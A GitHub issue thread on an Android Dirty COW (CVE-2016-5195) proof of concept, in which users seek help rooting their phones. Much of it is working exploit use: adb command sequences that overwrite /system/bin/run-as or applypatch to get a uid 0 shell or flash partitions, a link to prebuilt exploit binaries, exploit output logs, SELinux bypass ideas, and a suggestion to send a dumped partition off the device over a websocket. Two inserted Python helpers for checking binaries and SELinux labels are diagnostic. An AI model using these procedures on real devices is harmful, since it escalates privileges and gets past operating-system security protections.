timwr / CVE-2016-5195

CVE-2016-5195 (dirtycow/dirtyc0w) proof of concept for Android

How can I use it? #14

Closed elgolondrino closed 7 years ago

elgolondrino commented 8 years ago

First of all, thank you for the exploit for privilege escalation! Could you tell me please how I can use it? I'm a beginner; can anybody guide me through? Some say that some lines of code are missing for proper work. Is that true?

joel0 commented 8 years ago

This is just a proof of concept that it's possible to obtain UID 0 (root), but on Android 4.4+ SELinux prevents this example from doing a full root. This is not a full solution for rooting. If I understand what you are looking for, you shouldn't use your time using this example.

jcadduono commented 8 years ago

Yeah, I've tried so many things; unfortunately you're limited to what run-as is capable of for contexts.... which is really just changing your UID lol. There's no way to change the context after that, since anything run by the new run-as is still stuck in the runas_exec context as well. Shame, because I really wanted to write/read to/from blocks! :P

I think if someone can find a context switch exploit then they could be combined into a mega security vulnerability!

benzrad commented 8 years ago

I just want to put my gapps' apk files under system/app, for my Android doesn't allow zip flash, nor does sideload succeed. Yes, I got uid=0; then who helps directing me to push my gapps apks into system/app? su can't run (no such file), and remount system fails, hence no way to allow modification. TIA.

ghost commented 8 years ago

Hi, I have a Samsung phone that runs on Jellybean. The problem is I can't root it with whatever methods are available. Hence, is there a way to use this to achieve root?

jcadduono commented 8 years ago

@shanmukhateja I don't know if this binary will run on Jelly Bean as it's compiled for SDK 21, but you can try: https://build.nethunter.com/android-tools/dirtycow/armv7

adb push dirtycow /data/local/tmp
adb push cow-exec /data/local/tmp
adb shell
$ chmod 0777 /data/local/tmp/*
$ /data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/cow-exec
$ run-as -exec sh
Current uid: 2000
Setting capabilities
Attempting to escalate to root
Current uid: 0
Executing: 'sh' with 0 arguments

# (you are root)

you should now be root and be able to do whatever you want, remount your system and copy to it using (inside your adb shell as root):

# mount -o remount,rw /system
# cp /sdcard/whatever /system/wherever
# mount -o remount,ro /system

wonder if JB kernels are even vulnerable. I am able to do this on my Galaxy Explode7 with SELinux set to permissive.

My fork with cow-exec is here: https://github.com/jcadduono/CVE-2016-5195

ghost commented 8 years ago

Thank you. This may help :)

ghost commented 8 years ago

@jcadduono thanks, I'm going to try it on a non-permissive SELinux. Do you have any way to set a non-rooted SELinux to permissive?

jcadduono commented 8 years ago

No I don't; you'll have to try to find ways to abuse policies for your use by replacing services available in init and using "start servicename".

I managed to hijack applypatch to write to partitions just now... :) LG V20 T-Mobile is saved by dirtycow! start flash_recovery <- the irony

ghost commented 8 years ago

@jcadduono
Thanks for all, I'll keep looking. I'm able to get root access using your cow-exec but fucking SELinux doesn't even let me exec sh.... but run-as -exec toybox (some of the commands) works. I'm trying to find a way to flash unlock.img into mmcblk0p17 because this phone can't be unlocked or rooted by any other means since the last OTA update.

ghost commented 8 years ago

I was able to run-as -exec cat init.rc and found:

service flash_recovery /system/bin/install-recovery.sh
    class main
    oneshot

but

1|shell@R1_HD:/system/bin $ run-as -exec cat install-recovery.sh
Current uid: 2000
Setting capabilities
Attempting to escalate to root
Current uid: 0
Executing: 'cat' with 1 arguments

cat: install-recovery.sh: Permission denied

Can I dirtycow /system/bin/install-recovery.sh /data/local/tmp/myinstallscript.sh

where myinstallscript.sh is dd if=/sdcard/unlock.img of=/dev/block/mmcblk0p17

then run-as -exec start flash_recovery?

jcadduono commented 8 years ago

You can't replace shell scripts; they are executed by sh, which doesn't have a context for flashing. You need to use a binary that flashes the partition to replace applypatch (and usually applypatch only has permissions to write to the recovery partition, not any others).

ghost commented 8 years ago

@jcadduono dirtycow can't see install-recovery.sh ... will head home to compile your applypatch dirtycow for phones and see if I can flash twrp with it. ETA 40 mins, freaking traffic lol

jcadduono commented 8 years ago

Just know that if your bootloader is locked you can't boot twrp no matter what.

jcadduono commented 8 years ago

you'll need to set your recovery block device location in cow-applypatch-flash.c before compiling

adb push twrp.img /sdcard/recovery.img
adb push dirtycow /data/local/tmp
adb push cow-applyimage-flash /data/local/tmp
adb shell
$ chmod 0777 /data/local/tmp/dirtycow
$ /data/local/tmp/dirtycow /system/bin/applypatch /data/local/tmp/cow-applypatch-flash
$ setprop ctl.start flash_recovery
$ logcat | grep cow    (you can see flash progress or failure with this)

ghost commented 8 years ago

@jcadduono if I have to unlock the bootloader first then I don't know what to do. I can't think of a way to flash or dd unlock.img into /dev/block/mmcblk0p17.

ghost commented 8 years ago

@jcadduono setprop ctl.start flash_recovery doesn't trigger anything...

The original method to unlock and root this phone was using spfts to flash recovery twrp, then root, and finally unlock the bootloader. Since I took the OTA without unlocking and rooting first, I'm unable to use the only known method. That is why I have spent the last 3 days trying to find a way with dirtycow. Phone is Blu R1 HD, OTA version 6.6v.

Zahin-10 commented 8 years ago

The binaries provided by @jcadduono aren't working for some reason, I don't know why. This is the error message: CANNOT LINK EXECUTABLE: empty/missing DT_HASH in "/data/local/tmp/dirtycow" (built with --hash-style=gnu?)

I was using this because I couldn't compile the source files. I managed to install the NDK r13 but when I try to build it says this: [screenshot: capture]
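The "empty/missing DT_HASH" message above is the bionic dynamic linker refusing a binary that only carries a GNU-style hash table: older Android linkers (before Android 6.0) need the SysV DT_HASH entry. The checker below is an added example, not code from this repository; it parses the PT_DYNAMIC segment of an ELF64 little-endian image and reports which hash tables are present, and make_test_elf builds a constructed minimal image so it runs offline.

```python
import struct

# Dynamic-section and program-header constants from the ELF specification.
DT_NULL, DT_HASH, DT_GNU_HASH = 0, 4, 0x6FFFFEF5
PT_DYNAMIC = 2
EM_AARCH64 = 0xB7

def dynamic_tags(elf: bytes) -> set:
    """Return the set of d_tag values in the PT_DYNAMIC segment of an
    ELF64 little-endian image (the layout used by arm64-v8a binaries)."""
    if elf[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    if elf[4] != 2 or elf[5] != 1:
        raise ValueError("only ELF64 little-endian is handled by this checker")
    e_phoff, = struct.unpack_from("<Q", elf, 0x20)
    e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 0x36)
    tags = set()
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        p_type, = struct.unpack_from("<I", elf, off)
        if p_type != PT_DYNAMIC:
            continue
        p_offset, _va, _pa, p_filesz = struct.unpack_from("<QQQQ", elf, off + 8)
        for j in range(p_filesz // 16):          # Elf64_Dyn is 16 bytes
            d_tag, _d_val = struct.unpack_from("<qQ", elf, p_offset + j * 16)
            if d_tag == DT_NULL:
                break
            tags.add(d_tag)
    return tags

def check_hash_style(elf: bytes) -> str:
    """Say whether a linker that requires DT_HASH would accept this image."""
    tags = dynamic_tags(elf)
    if DT_HASH in tags:
        return "ok: DT_HASH present"
    if DT_GNU_HASH in tags:
        return "missing DT_HASH: only DT_GNU_HASH (built with --hash-style=gnu?)"
    return "no hash table: static binary or no PT_DYNAMIC segment"

def make_test_elf(tags) -> bytes:
    """Constructed minimal ELF64 image: header, one PT_DYNAMIC program header,
    then the given dynamic tags followed by DT_NULL. Not a loadable binary."""
    dyn = b"".join(struct.pack("<qQ", t, 0) for t in tags) + struct.pack("<qQ", DT_NULL, 0)
    dyn_off = 64 + 56                            # directly after ehdr + one phdr
    ehdr = (b"\x7fELF" + bytes([2, 1, 1, 0]) + bytes(8)
            + struct.pack("<HHIQQQIHHHHHH", 3, EM_AARCH64, 1, 0, 64, 0, 0,
                          64, 56, 1, 64, 0, 0))
    phdr = struct.pack("<IIQQQQQQ", PT_DYNAMIC, 6, dyn_off, 0, 0, len(dyn), len(dyn), 8)
    return ehdr + phdr + dyn

if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else make_test_elf([DT_GNU_HASH])
    print(check_hash_style(data))
```

Run it with a path to a real arm64 binary to see which table the toolchain emitted; a DT_HASH result means the image would not hit this linker error.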

brandsjek commented 8 years ago

using @jcadduono's binaries, run-as is in /system/bin, but it is 770 so I can't execute it. darn. help would be useful. Nexus 5x, 7.1 preview.

jcadduono commented 8 years ago

@Zahin-10 I missed the LOCAL_ in LOCAL_SDK_VERSION :$ You can redownload them; they should be compiled for the 5.0 API right now, which will probably allow them to run on KitKat - Nougat.

if you want to try the changes from my repository, on an older API I suppose you'll need to compile them yourself.

Wish I knew what your build issue was about; I use an Android repository for building targets rather than just the NDK by itself. Could be a clang issue? Maybe you could try adding to the Makefile, to the ndk_build line with APP_PLATFORM:

NDK_TOOLCHAIN_VERSION=4.8

@Flippylosaurus yeah, you'll have to look into other binaries I suppose; run-as isn't useful in any way. There might be some other binaries that have contexts with lots of permissions, and you can do things in the OS to have the system trigger them (making them root with a dangerous context, allowing you to exploit with them), rather than the shell triggering them as just the runas context, which can't do anything as root except see root files.

ghost commented 8 years ago

Is there a way to see the contexts and permissions of every binary? I have people that rooted before the OTA and can check if there is a way.

jcadduono commented 8 years ago

I've been using find /system/ -type f -exec ls -Z "{}" \; | grep _exec but it doesn't catch every scenario, since yeah, you can't see a lot of binaries, and sometimes there are regular binaries executed by shell scripts from the system that don't have contexts but gain the contexts of their executor.
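The find/ls -Z one-liner above only lists files that already carry a *_exec type. The script below is an added policy-review helper, not code from this repository: it parses ls -Z output (a constructed sample is embedded, and the "context path" column layout is an assumption about the toybox output) and reports the labelling gaps the grep cannot show, i.e. executables under /system/bin with a plain file type, which get no domain transition and run in whatever domain invoked them.

```python
import re
from collections import defaultdict

# Constructed sample of `find /system/ -type f -exec ls -Z "{}" \;` output.
# The type names are illustrative; the last line shows the older toolbox layout
# with mode and owner columns, which the regex tolerates by searching, not matching.
SAMPLE_LS_Z = """\
u:object_r:shell_exec:s0 /system/bin/sh
u:object_r:runas_exec:s0 /system/bin/run-as
u:object_r:install_recovery_exec:s0 /system/bin/install-recovery.sh
u:object_r:dnsmasq_exec:s0 /system/bin/dnsmasq
u:object_r:system_file:s0 /system/bin/oem_flash_helper.sh
u:object_r:system_file:s0 /system/lib/libc.so
-rwxr-xr-x root shell u:object_r:toolbox_exec:s0 /system/bin/toybox
"""

LINE_RE = re.compile(r"u:object_r:(?P<type>\w+):s0\s+(?P<path>/\S+)\s*$")

def parse_ls_z(text):
    """Yield (selinux_type, path) for each line that carries a file context."""
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            yield m.group("type"), m.group("path")

def audit_contexts(text, exec_dirs=("/system/bin/", "/system/xbin/")):
    """Group files by SELinux type and list executables with no *_exec type.

    A file in an executable directory labelled with a generic type such as
    system_file has no domain transition of its own: when a script or service
    runs it, it keeps the caller's domain. Those are the labelling gaps a
    policy reviewer should look at, and grepping for _exec never shows them."""
    by_type = defaultdict(list)
    no_transition = []
    for sel_type, path in parse_ls_z(text):
        by_type[sel_type].append(path)
        if path.startswith(exec_dirs) and not sel_type.endswith("_exec"):
            no_transition.append(path)
    return dict(by_type), no_transition

if __name__ == "__main__":
    by_type, gaps = audit_contexts(SAMPLE_LS_Z)
    for sel_type in sorted(by_type):
        print(f"{sel_type:28} {len(by_type[sel_type])} file(s)")
    print("executables without a dedicated *_exec type:", gaps)
```

On a device, feed it the real output (adb shell 'find /system/ -type f -exec ls -Z "{}" \;' > contexts.txt) instead of the sample.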

ghost commented 8 years ago

127|shell@R1_HD:/data/local/tmp $ logcat | grep cow
10-26 23:11:44.049  4377  4377 I cow-applypatch-flash: Current uid: 0
10-26 23:11:44.049  4377  4377 I cow-applypatch-flash: Starting image flash...
10-26 23:11:44.049  4377  4377 I cow-applypatch-flash: Could not open input/output file as r/w!

So it works.... just need to find a file exec triggered by something that can write into /dev/block/mmcblk0p8 (recovery block) ... I dirtycow'd cow-applypatch into dnsmasq and turned on the wifi hotspot, and it gave me that lock.... I didn't edit applypatch for the file locations; will do that tomorrow.

If it flashes, will it brick my bootloader-locked phone?

jcadduono commented 8 years ago

It shouldn't brick it, but you won't be able to boot your recovery; the whole point of bootloader locking is signature enforcement on Android boot partitions, so if it's not signed, it won't boot the image.

ghost commented 8 years ago

@jcadduono you are the best. just saw your recowvery-app_process64.c and recowvery-applypatch.c

How do you trigger them? Can't wait to try it on my Blu.... your C code is very similar to the script made to unlock it before the last OTA.

serajr commented 8 years ago

@jcadduono First of all thank you for exploit!! @timwr as well!!!

Your binaries (dirtycow and cow-exec) just worked on latest 6.0.1 (xperia stock fw), but I was on an already killed SELinux scenario. Got root shell, see output:

warning: new file size (13884) and file old size (17920) differ

size 17920

[*] mmap 0xb6dac000
[*] exploit (patch)
[*] currently 0xb6dac000=464c457f
[*] madvise = 0xb6dac000 17920
[*] madvise = 0 1048576
[*] /proc/self/mem 1610612736 1048576
[*] exploited 0xb6dac000=464c457f
shell@D5833:/ $ getenforce
Permissive
shell@D5833:/ $ run-as -exec sh
Current uid: 2000
Setting capabilities
Attempting to escalate to root
Current uid: 0
Executing: 'sh' with 0 arguments

shell@D5833:/ #

But on the same and untouched fw, output is:

warning: new file size (13884) and file old size (17920) differ

size 17920

[*] mmap 0xb6e06000
[*] exploit (patch)
[*] currently 0xb6e06000=464c457f
[*] madvise = 0xb6e06000 17920
[*] madvise = 0 1048576
[*] /proc/self/mem 1610612736 1048576
[*] exploited 0xb6e06000=464c457f
shell@D5833:/ $ getenforce
Enforcing
shell@D5833:/ $ run-as -exec sh
Current uid: 2000
Setting capabilities
Attempting to escalate to root
Current uid: 0
Executing: 'sh' with 0 arguments

Failed to execute 'sh'!
1|shell@D5833:/ $

I'd like to run a script stored at /data/local/tmp/script.sh (it worked before on first scenario I've described)

Is SELinux "Enforcing" the culprit? if so, is there a way to change it to "Permissive" before "run-as -exec sh" command? Or any other workaround?

Any help/advice would be great! Thanks in advance!!

Zahin-10 commented 8 years ago

@jcadduono Thanks, I redownloaded it, but now there is another issue: it kinda worked out but at the end it shows this: [screenshot: capture]

brandsjek commented 8 years ago

@jcadduono maybe this might help:

ndk-build NDK_TOOLCHAIN_VERSION=4.9 NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_PLATFORM=android-21
make[1]: Entering directory '/home/hillebrand/Software/ext_dirtycow'
[arm64-v8a] Executable     : cow-exec
./obj/local/arm64-v8a/objs/cow-exec/cow-exec.o: In function `main':
/home/hillebrand/Software/ext_dirtycow/./cow-exec.c:39: undefined reference to `__android_log_print'
/home/hillebrand/Software/ext_dirtycow/./cow-exec.c:52: undefined reference to `__android_log_print'
/home/hillebrand/Software/ext_dirtycow/./cow-exec.c:54: undefined reference to `__android_log_print'
/home/hillebrand/Software/ext_dirtycow/./cow-exec.c:57: undefined reference to `__android_log_print'
/home/hillebrand/Software/ext_dirtycow/./cow-exec.c:59: undefined reference to `__android_log_print'
./obj/local/arm64-v8a/objs/cow-exec/cow-exec.o:/home/hillebrand/Software/ext_dirtycow/./cow-exec.c:63: more undefined references to `__android_log_print' follow
collect2: error: ld returned 1 exit status
/home/hillebrand/Software/android-ndk-r13/build/core/build-binary.mk:715: recipe for target 'obj/local/arm64-v8a/cow-exec' failed
make[1]: *** [obj/local/arm64-v8a/cow-exec] Error 1
make[1]: Leaving directory '/home/hillebrand/Software/ext_dirtycow'
Makefile:5: recipe for target 'build' failed
make: *** [build] Error 2

Sonic5317 commented 8 years ago

@serajr You said you got this working on the latest Xperia 6.0.1 was that by any chance on an Xperia XZ? I'm looking for root to be able to backup the phones TA partition.

serajr commented 8 years ago

@Sonic5317 yep, I got it working, but it is only a very limited spawned root shell with u:r:shell:s0 context. It has no privileges enough to dd/copy the TA partition, unfortunately! But you can "debloat" your rom at least, by disabling packages which a regular shell could not!! I will release my Xperia X line dirtycow debloat script soon (xda)!

I'm still working on it, and if maybe @dosomder (zxz0O0) could help us out on something (byeselinux on that context, if possible ofc - or trying to switch the context to init or system_server with a different approach), it would be great!!

Edit: @GetMe20002 how did you change the context to init and set selinux enforcing to permissive? What's your device/android version? Thanks in advance!! ;)

dosomder commented 8 years ago

@serajr app_process can switch context to system_server and load kernel modules (for example byeselinux). However, at least on 32bit when you crash app_process the phone reboots because of clmcheck.

You could load a modified app_process which takes over without crashing the process but this would be a device / firmware specific solution.

serajr commented 8 years ago

@dosomder thank you so much! You're right (as always), crashing app_process (app_process32) does reboot the phone (Z3C), and I suppose app_process64 as well. Do you think if somehow we manage to get the system_server context we can temporarily insmod byeselinux.ko? Is that enough to run iovyroot's backup.sh successfully? Forgive me, I'm a Windows guy.

The main goal with dirtycow vuln is being able to perform TA partition's backup of Xperia X line up, which kernels seem to be patched for iovyroot (I'm not pretty sure about that).

dosomder commented 8 years ago

@serajr You would have to verify the current selinux policies on the newer phones. At least on my Z3C, the system_server context is enough to load kernel modules and disable selinux which allows backup of TA partition.

fuzun commented 8 years ago

Does this trigger KNOX?

serajr commented 8 years ago

@dosomder I've also got u:r:netd:s0 (and netmgrd:s0) context, crashing ip binary. But I don't know if it has privileges enough to make copy (dd), and even if it does, it looks like it cannot write to the /sdcard nor /data. Is there a way to perform dd of TA and instead of write it to device, upload it out somehow (using curl maybe, or another approach)?

By the way, are you thinking about, or are you working on, a new temp root tool using dirtycow (or another vuln)? I ask you that because you did such an amazing job with giefroot and iovyroot, which imho, every Xperia user owes you at least eternal gratitude for!

Thanks in advance!

dosomder commented 8 years ago

@serajr I don't know if this context has permission to read TA partition, but you can indeed create a websocket and upload data over it to your computer for example.

I am not working on a root tool. I have limited time and it's not worth it for me to create another tool at the moment.

SerraraFluttershy commented 7 years ago

How could I use this on a Kindle Fire HD 6 running Fire OS 5.3.1.1? @jcadduono And...is there any way I could install SuperSU without needing recovery?

walkman4321 commented 7 years ago

@serajr I am also trying on a Samsung Galaxy O7, Android 6.0.1:

$ make root
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_ABI=armeabi-v7a APP_PLATFORM=android-23
make[1]: Entering directory '/home/rohitnew/xlastfilder/CVE-2016-5195-master'
[armeabi-v7a] Compile thumb  : dirtycow <= dirtycow.c
[armeabi-v7a] Compile thumb  : dirtycow <= dcow.c
[armeabi-v7a] Executable     : dirtycow
[armeabi-v7a] Install        : dirtycow => libs/armeabi-v7a/dirtycow
[armeabi-v7a] Compile thumb  : run-as <= dirtycow.c
[armeabi-v7a] Compile thumb  : run-as <= run-as.c
[armeabi-v7a] Executable     : run-as
[armeabi-v7a] Install        : run-as => libs/armeabi-v7a/run-as
make[1]: Leaving directory '/home/rohitnew/xlastfilder/CVE-2016-5195-master'
adb push libs/armeabi-v7a/dirtycow /data/local/tmp/dcow
[100%] /data/local/tmp/dcow
adb shell 'chmod 777 /data/local/tmp/dcow'
adb shell 'chmod 777 /data/local/tmp/dcow'
adb push libs/armeabi-v7a/run-as /data/local/tmp/run-as
[100%] /data/local/tmp/run-as
adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/run-as'
dcow /data/local/tmp/run-as /system/bin/run-as
warning: new file size (5544) and destination file size (17916) differ

[*] size 17916
[*] mmap 0xb6e14000
[*] currently 0xb6e14000=464c457f
[*] using /proc/self/mem method
[*] madvise = 0xb6e14000 17916
[*] madvise = 0 16777216
[*] /proc/self/mem 1515137308 564025
[*] exploited 0 0xb6e14000=464c457f

$ adb shell

shell@o7prolte:/ $ getenforce
Enforcing
127|shell@o7prolte:/ $ run-as -exec sh
run-as: Package '-exec' is unknown

Is there anything I am doing wrong? Please help me.

ghost commented 7 years ago

ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_ABI=arm64-v8a APP_PLATFORM=android-23
make[1]: Entering directory '/home/xuan/CVE-2016-5195-master'
[arm64-v8a] Install        : dirtycow => libs/arm64-v8a/dirtycow
[arm64-v8a] Install        : run-as => libs/arm64-v8a/run-as
make[1]: Leaving directory '/home/xuan/CVE-2016-5195-master'
adb push libs/arm64-v8a/dirtycow /data/local/tmp/dcow
26 KB/s (13856 bytes in 0.510s)
adb shell 'chmod 777 /data/local/tmp/dcow'
adb shell 'chmod 777 /data/local/tmp/dcow'
adb push libs/arm64-v8a/run-as /data/local/tmp/run-as
57 KB/s (9760 bytes in 0.165s)
adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/run-as'
dcow /data/local/tmp/run-as /system/bin/run-as
warning: new file size (9760) and destination file size (14192) differ

[*] size 14192
[*] mmap 0x7f8d443000
[*] currently 0x7f8d443000=10102464c457f
[*] using ptrace method

shell@F04G:/ $ run-as -exec sh
run-as: Package '-exec' is unknown

timwr commented 7 years ago

Try make test; I don't think you're vulnerable. Your phone has the fix.